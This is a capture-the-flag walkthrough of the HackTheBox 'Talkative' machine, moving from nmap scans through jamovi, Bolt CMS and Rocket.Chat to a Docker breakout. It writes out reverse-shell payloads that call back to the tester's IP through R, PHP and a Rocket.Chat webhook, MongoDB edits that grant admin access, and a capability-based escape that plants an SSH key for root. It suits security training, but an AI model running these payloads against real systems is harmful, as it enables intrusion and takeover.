CTF-Writeups/HackTheBox/Talkative.md
2022-09-03 15:42:42 +05:00

17 KiB

HackTheBox - Talkative

NMAP

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52
3000/tcp open  ppp?
| fingerprint-strings:
|   GetRequest:                  
|     HTTP/1.1 200 OK
|     X-XSS-Protection: 1
|     X-Instance-ID: i3D7nWb4BARMskXKt
|     Content-Type: text/html; charset=utf-8
|     Vary: Accept-Encoding  
|     Date: Sat, 09 Apr 2022 19:09:17 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/3ab95015403368c507c78b4228d38a494ef33a08.css?meteor_css_resource=tr
ue">
|     <meta charset="utf-8" />
|     <meta http-equiv="content-type" content="text/html; charset=utf-8" />
|     <meta http-equiv="expires" content="-1" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
|     <meta name="fragment" content="!" />
|     <meta name="distribution" content="global" />
|     <meta name="rating" content="general" />
|     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
|     <meta name="mobile-web-app-capable" content="yes" />
|     <meta name="apple-mobile-web-app-capable" conten
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-XSS-Protection: 1
8080/tcp open  http    Tornado httpd 5.0
|_http-title: jamovi
8081/tcp open  http    Tornado httpd 5.0
|_http-title: 404: Not Found
8082/tcp open  http    Tornado httpd 5.0
|_http-title: 404: Not Found

PORT 80 (HTTP)

Visiting port 80 will redirect us to talkative.htb so let's add this to /etc/hosts file

Scolling below we do see some names which can be helpful for us later

Going at the bottom we have 2 links about the products which will be launched soon

The first one "TALK-A-STATS" is about a JAMOVI spreadsheet software running on port 8080

And the other "TALKFORBIZ" is rocket chat running on port 3000

I tried fuzzing for files using dirsearch but it was awfully slow

Checking what wappalyzer showed us about what backend or technologies the website is using

It's using bolt cms, we can access the login page by visting /bolt, I found this end point by lookup at bolt's documentation

https://docs.boltcms.io/5.0/manual/login

Right now we don't have any credentials so let's just move on

PORT 3000 (rocket chat)

I tried creating an account on rocket chat

It then prompted error about invalid domain

So let's just used talkative.htb as domain name

This allowed us to register an account but we don't see anything there apart from General channel in which there's only admin

So I decided to run the exploit for password reset on admin account

https://www.exploit-db.com/exploits/50108

But it didn't seem that it was working as it was just printing the alphabets

PORT 8080 (jamovi)

Checking for exploits related jamovi there's one related to XSS that can be escalted to rce

https://sploitus.com/exploit?id=F45F77BE-1B49-5574-A908-64EF4C774BD7&utm_source=rss&utm_medium=rss

The description of exploit says

Jamovi is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.

So the column name is vulnerable to XSS, let's test this if it works here

Now when we refresh the page it's going to execute the alert command

But this was only XSS and we can't escalate this further to get rce in this scenario

If we see the options we have on javormi there's Rj editor, so we can try to execute commands using the R language

So lookup the documentation for R langague we can execute system commands like this

https://rdrr.io/r/base/system.html

system("bash -c 'id'", intern = TRUE)

We get the output of the id command as a root user but we are not actually the root user on the target machine, if we check the hostname this will return as a random value which indicates that we are inside a docker container

To get a reverse shel I used bash reverse encoded in base64

system("bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ni8yMjIyIDA+JjEK | base64 -d |bash'",intern = TRUE)

After getting a shell we can stabilize it so we can get the functionality of using arrow keys and tab auto complete

In root's folder we can see a omv file named bolt-administration

Now the issue here was there was no netcat,net-tools,curl or wget that I could transfere this omv file on to my machine neither there was any tool to unzip the omv file so I base64 encoded the contents of the file

Copied it on my host machine's terminal and saved it then piped it to base64 decode and got the file

Reading the xdata.json we can see usernames and passwords for bolt

I tried the credentials for janit , it failed

Tried sual's credentials which gave an error on authenticating

Same with matt, so I decided to test admin as the username with the passwords and jeO09ufhWD<s worked for the admin user

We can also see the bolt version which is Bolt v 5.1.3

Having access to admin dashboard we can an option to upload files but problem is that it has a whitelist that is allowing specfic file extensions

Visting All Configuration Files from Configuration we'll see a file named bundles.php

Adding a php command in that file will lead too execute that on a 404 request

I tried getting the reverse shell the same way as I did with javormi container but the connection kept closing

system("bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ni8yMjIyIDA+JjEK | base64 -d |bash'")

Instead I just copied php bash a web interactive shell in bundles.php

https://github.com/Arrexel/phpbash/blob/master/phpbash.php

So looks like we are in another container and this would be for bolt cms, we can get a reverse shell from here

The reason I used rlwrap before nc is because there's no python or python3 on container which would allow us to stabilize the shell to get autocomplete and naviagting around bash history so rlwrap kinda gives us that functionaility

On the conatiner we can also see that there's curl so we can download nmap and run a scan to see if there are any other containers in the network

But I wasn't able to run the nmap on the container as it first checked if service scripts were in the path and if not it would revert to /etc/services which wasn't on the container as well

I thought of using ssh on the target machine (talkative.htb) as the docker gateways is the host machine but it was giving an error because we didn't have a tty shell

This can be resolved by using script to spawn bash shell

And with the password jeO09ufhWD<s we can login in saul on the host machine

We can try to get a stabilize shell by first getting a reverse shell and stabilizing it with python3

After I transferred pspy to monitor the background processes running

update_mongo.py seemed interesting but we didn't had permissions to read it so checking to see if there's any local port listening

This gave us a lot of open ports but out all of open ports, port 3000 seemes interesting as this is what we encountered earlier and it semes that it's hosted from this machine

Checking the apache config files to see where rocket chat's directory is

It didn't showed us the path but we know that admin@talkative.htb is a valid username on that site, running arp -a will reveal how many containers the host is using

Using the static binary of nmap we transferred

Googling this port tells that this is for mongodb and rocket chat uses mongdb for it's backend

So we need to do port forwarding for 27017 that is open on 172.17.0.2 conatiner and we can do that by using chisel

https://github.com/jpillora/chisel/releases/tag/v1.7.7

Transferring this binary on the target machine

After transferring on the target machine we'll use chisel as a server on port 9000 using reverse proxy for port forwarding and on the target machine we'll use chisel client to conenct to port 9000 from our local machine and forwarding port 27017 from the container 172.17.0.2

This article does a great job in explaning this process

https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683

To interact with mongodb we need to use mongosh, it isn't installed by default so downloading mongo db and it's dependencies

https://www.dailytask.co/task/install-mongo-shell-in-ubuntu-ahmed-zidan

Using this command we'll be able to connect to mongodb

mongosh "mongodb://localhost:27017"

Getting connected to mongo backend we can run commands to enumerate databases, I wasn't familar with using mongosh so this article helped me in enumerating the databaes and tables

https://dzone.com/articles/mongodb-commands-cheat-sheet-for-beginners

We can see the size of meteor is around 5 MB so it must be having some data, switching to meteor database with use meteor

Listing the values in users with db.user.find()

At first I tried changing the password to 12345 and converting into bcrypt hash and then updating the admin user's password

https://docs.rocket.chat/guides/administration/misc.-admin-guides/restoring-an-admin

db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$ZcP2SxsOH811cJjuxgvk.udV8pkPx7Hw6G9GqKr08S3ZcYFnNRz7C" } } } })

But this wasn't working as when I visited the rocket chat site it was still giving an error on login so instead I created a user and gave him the admin role

db.users.update({username: "arz"}, { $push: { roles: "admin"}})

The reason why I port forwarded 3000 is because it wasn't repsonding normally with talkative.htb:3000 so I port forwarded like I did for mongodb

We can get remote execution by using node js and calling a bash reverse shell, there's a blog explaining abusing intergration to get remote code execution

https://blog.sonarsource.com/nosql-injections-in-rocket-chat

Access the administration panel and visit Integrations and then select Incoming WebHook

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.73/6666 0>&1'");

After saving changes, you'll get a url for webhook

Visit this link and you'll get a shell

After getting a shell we are again inside a container, there wasn't anything interesting on this container , so I decide to check what capabilites we have on this docker instance

So no capsh binary but there's another way to view capabilites by reading /proc/self/status and using capsh from our local machine

https://blog.nody.cc/posts/container-breakouts-part2/

Copying the value CapBnd which is 00000000a80425fd

Here we can see a capability cap_dac_read_search which allows us to read the files from the host machine

https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3

There was an exploit written in c language which was linked in the article, I downloaded the source code and compiled on my local machine

http://stealth.openwall.net/xSports/shocker.c

Since there was no wget or curl through which we can download binary , I used the cat to download the binary from our machine by hosting it through nc

cat < /dev/tcp/10.10.14.139/1111 > test
nc -lnvp 1111 < test

But this exploit failed to ran, so went on searching other exploits and found a github repo for cdk

https://github.com/cdk-team/CDK

Downloaded the binary on my local machine and transferred it the same way

Tried running this binary to read /etc/hosts from the host machine but still it failed

Nex tried this command

./cdk run cap-dac-read-search /etc/hosts /

This worked as it was able to chdir to host root / as spawning bash, to get a shell on the host machine as root user we can put our public key in /root/.ssh/authorized_keys

Going back to the host machine as saul user and downloading the ssh private key

References